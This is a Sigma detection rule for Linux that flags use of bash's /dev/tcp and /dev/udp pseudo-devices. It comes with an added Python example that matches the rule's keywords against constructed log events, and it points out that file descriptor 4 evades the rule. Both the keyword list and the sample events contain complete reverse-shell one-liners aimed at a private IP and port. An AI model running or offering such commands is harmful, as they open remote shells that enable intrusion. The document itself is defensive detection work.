Type: Detection | Level: medium | Status: test

Suspicious Use of /dev/tcp

Detects suspicious commands that use bash's /dev/tcp and /dev/udp pseudo-devices, the redirection trick behind common reverse-shell one-liners and ad-hoc socket reads and writes.

Author: François Hubaut
Created: Fri Dec 10
Updated: Fri Jan 06
Rule ID: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c
Product tag: linux
Log Source
Product: Linux (raw: linux)
Detection Logic (1 selector)
detection:
    keywords:
        - 'cat </dev/tcp/'
        - 'exec 3<>/dev/tcp/'
        - 'echo >/dev/tcp/'
        - 'bash -i >& /dev/tcp/'
        - 'sh -i >& /dev/udp/'
        - '0<&196;exec 196<>/dev/tcp/'
        - 'exec 5<>/dev/tcp/'
        - '(sh)0>/dev/tcp/'
        - 'bash -c ''bash -i >& /dev/tcp/'
        - 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/'
    condition: keywords
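Added worked example (not part of the rule or of the Sigma project): the keyword block above expressed as a Python matcher and run over constructed command-line events. `DEV_TCP_KEYWORDS`, `match_rule`, `run_detection` and `SAMPLE_EVENTS` are names chosen here; `match_broad` and its regex are an illustrative broadening of the rule, assumed for the example and not something the rule contains. Sigma evaluates a bare `keywords` list as case-insensitive substring matches against the whole event, which is what `match_rule` reproduces.

```python
"""Constructed worked example: the Sigma rule's keyword block as a Python matcher.
Not part of the rule or the Sigma project; the sample events below are made up."""
import re
from typing import List, Tuple

# Keywords copied from the detection block. The last two are the YAML values
# with the doubled '' unescaped; the \n in the final one is a literal
# backslash-n, exactly as it appears in the rule.
DEV_TCP_KEYWORDS = [
    "cat </dev/tcp/",
    "exec 3<>/dev/tcp/",
    "echo >/dev/tcp/",
    "bash -i >& /dev/tcp/",
    "sh -i >& /dev/udp/",
    "0<&196;exec 196<>/dev/tcp/",
    "exec 5<>/dev/tcp/",
    "(sh)0>/dev/tcp/",
    "bash -c 'bash -i >& /dev/tcp/",
    "echo -e '#!/bin/bash\\nbash -i >& /dev/tcp/",
]


def match_rule(event: str) -> List[str]:
    """Return every rule keyword found in `event`; an empty list means no alert.
    'condition: keywords' means: any keyword is a substring of the event
    (case-insensitive, no wildcards present in this rule)."""
    lowered = event.lower()
    return [kw for kw in DEV_TCP_KEYWORDS if kw.lower() in lowered]


# Illustrative broadening (an assumption for this example, NOT part of the rule):
# any /dev/tcp/<host>/<port> or /dev/udp/<host>/<port> target, regardless of
# which file-descriptor number the command uses.
DEV_SOCKET_RE = re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+", re.IGNORECASE)


def match_broad(event: str) -> bool:
    """True if the event references a /dev/tcp or /dev/udp socket path at all."""
    return DEV_SOCKET_RE.search(event) is not None


# Constructed command-line events in a made-up "uid=... cmd=..." log format.
SAMPLE_EVENTS = [
    "uid=1001 cmd=bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",    # reverse shell
    "uid=1001 cmd=exec 3<>/dev/tcp/10.0.0.5/80; cat <&3",      # raw socket read on fd 3
    "uid=1001 cmd=sh -i >& /dev/udp/10.0.0.5/53 0>&1",         # UDP variant
    "uid=1001 cmd=exec 4<>/dev/tcp/10.0.0.5/80; cat <&4",      # fd 4: not in the keyword list
    "uid=0 cmd=cat /proc/net/tcp",                             # benign
    "uid=0 cmd=echo status >/var/log/dev/tcp.log",             # benign lookalike
]


def run_detection(events: List[str]) -> List[Tuple[str, List[str]]]:
    """Apply the rule to each event and keep only the ones that alert."""
    alerts = []
    for ev in events:
        hits = match_rule(ev)
        if hits:
            alerts.append((ev, hits))
    return alerts


if __name__ == "__main__":
    for ev, hits in run_detection(SAMPLE_EVENTS):
        print(f"ALERT {hits!r}: {ev}")
    for ev in SAMPLE_EVENTS:
        if not match_rule(ev) and match_broad(ev):
            print(f"not matched by the rule, caught by the broad regex: {ev}")
```

The fourth sample event is the caveat a triager should keep in mind: the rule only lists file descriptors 3, 5 and 196, so `exec 4<>/dev/tcp/...` produces no alert even though it opens the same kind of socket. The broad regex closes that gap at the cost of more hits to triage, including benign scripts that use /dev/tcp for connectivity checks.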
False Positives
Unknown

False positive likelihood has not been assessed. Additional context may be needed during triage.

MITRE ATT&CK
Reconnaissance (TA0043), from the tag attack.reconnaissance
Rule Metadata
Rule ID
6cc5fceb-9a71-4c23-aeeb-963abe0b279c
Status
test
Level
medium
Type
Detection
Created
Fri Dec 10
Modified
Fri Jan 06
Path
rules/linux/builtin/lnx_susp_dev_tcp.yml
Raw Tags
attack.reconnaissance